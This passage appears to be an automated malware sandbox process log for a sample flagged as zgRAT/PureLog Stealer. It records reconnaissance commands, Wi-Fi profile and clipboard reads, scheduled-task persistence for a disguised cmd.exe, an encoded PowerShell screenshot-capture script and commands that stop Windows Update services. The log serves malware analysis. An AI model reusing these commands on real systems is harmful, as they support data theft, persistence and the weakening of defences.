Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6ff4d0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:50:11
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6bb2f0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f
Imagebase:	0x7ff7e8de0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e8de0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e8de0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff632ac0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Imagebase:	0x7ff6abd40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:50:13
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6b3440000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff721120000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff633fa0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB2CE.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP"
Imagebase:	0x7ff658b90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	10:50:14
Start date:	02/09/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6b3440000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:50:15
Start date:	02/09/2024
Path:	C:\Windows\Logs\SettingSync\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Logs\SettingSync\cmd.exe
Imagebase:	0xec0000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Logs\SettingSync\cmd.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Logs\SettingSync\cmd.exe, Author: Joe Security
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:50:15
Start date:	02/09/2024
Path:	C:\Windows\Logs\SettingSync\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Logs\SettingSync\cmd.exe
Imagebase:	0x160000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6b3440000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff738e80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
